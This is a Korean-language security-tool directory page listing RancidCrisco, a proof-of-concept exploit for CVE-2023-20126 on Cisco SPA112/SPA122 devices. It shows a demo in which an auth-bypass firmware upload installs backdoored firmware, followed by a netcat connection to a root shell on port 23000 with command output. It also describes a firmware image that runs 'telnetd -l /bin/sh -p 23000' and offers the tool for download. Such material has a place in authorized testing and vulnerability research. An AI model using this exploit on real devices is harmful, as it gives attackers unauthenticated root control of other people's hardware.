Skip to content
KitploitKITPLOIT
도구블로그
제출
도구블로그
제출

해킹, 침투 테스트 및 사이버 보안 도구를 당신의 보안 무기고에!

Kitploit은 해킹, 사이버 보안 및 침투 테스트 도구 디렉토리입니다. 최신 프로젝트 업데이트를 발견하여 취약점을 찾고, 시스템을 분석하고, 테스트를 자동화하고, 보안을 강화하세요.

··피드·문의·개인정보·© 2026 Kitploit

도구 디렉토리

카테고리

모든 카테고리 보기
Loading categories
RancidCrisco — CVE-2023-20126용 PoC | Kitploit
도구/GitHubGitHub/fullspectrumdev/rancidcrisco
Embedded Systems SecurityVulnerability AnalysisExploitationPenetration TestingHardware & IoT SecurityRed TeamingRemote Access ToolFirmware Analysis
GitHubfullspectrumdev/rancidcrisco

RancidCrisco

CVE-2023-20126용 PoC

저장소 보기
2423년 전Kitploit 검토 완료

인기

모두 보기 →

커뮤니티에서 가장 많이 사용되는 도구를 찾아보세요.

모든 도구 탐색

도구 컬렉션을 둘러보세요

모든 도구 보기 →
공유

RancidCrisco

CVE-2023-20126에 대한 최소한의 PoC

이것은 초기 릴리스입니다. 작동하지만 '가장 간단한 경우'의 익스플로잇입니다.

SPA112/SPA122에서 테스트 및 작동 확인 - SPA232D는 다른 펌웨어 이미지가 필요합니다.

23000/tcp 포트에서 루트 셸을 제공합니다.

펌웨어 편집에 사용된 툴체인을 아직 정리해야 하며, 별도의 저장소에 넣을 것입니다. 주로 @BigNerd95의 작업을 기반으로 하지만 SPA112/122 펌웨어 파일에서 작동하도록 약간 수정했습니다.

데모.

root@kitploit:~
$ python3 CVE-2023-20126.py http://192.168.0.152 CFW.bin 
Base URL: http://192.168.0.152
Firmware File: CFW.bin
Sending firmware update...
Firmware upgrade successful. Device will reboot eventually and be running the new FW.

< wait a few mins, nervously > 

$ nc -v 192.168.0.152 23000
Connection to 192.168.0.152 port 23000 [tcp/inovaport1] succeeded!
????????


BusyBox v1.10.2 (2019-10-14 12:41:41 CST) built-in shell (ash)
Enter 'help' for a list of built-in commands.

# id;uname -a;pwd
id;uname -a;pwd
uid=0(admin) gid=0(admin)
Linux SPA112 2.6.26.5 #1 PREEMPT Sun Sep 6 10:54:57 CST 2015 armv5tejl unknown
/
# cat /etc/version
cat /etc/version
router_major_version:1.4.1
router_minor_version:SR5
build_date:Mon Oct 14 12:48:12 CST 2019
build_version:6735
hardware_version:1.1.0

파일

  • fwupload.py - 인증을 전혀 보내지 않음으로써 인증을 우회하여 CVE-2023-20126을 익스플로잇하는 펌웨어 이미지 업로더. 두 개의 인자를 받음: 장치 웹 UI의 URL과 업로드할 펌웨어 파일.
  • telnet-23000.bin - telnetd -l /bin/sh -p 23000을 실행하여 23000/tcp 포트에 루트 셸을 제공하는 PoC 악성 펌웨어 이미지. bignerd95의 작업을 기반으로 함.

라이선스

WTFPL.

버그

git issue를 사용하세요.

면책 조항

이게 당신의 장치를 벽돌로 만들어도 저는 책임을 지지 않습니다.
그건 당신의 문제입니다.
뭐, 저는 그 백도어 펌웨어를 저녁에 대충 만들어 냈습니다.
게다가, 왜 작성 가이드를 따라 자신만의 백도어 펌웨어를 직접 만들지 않습니까?

도구 다운로드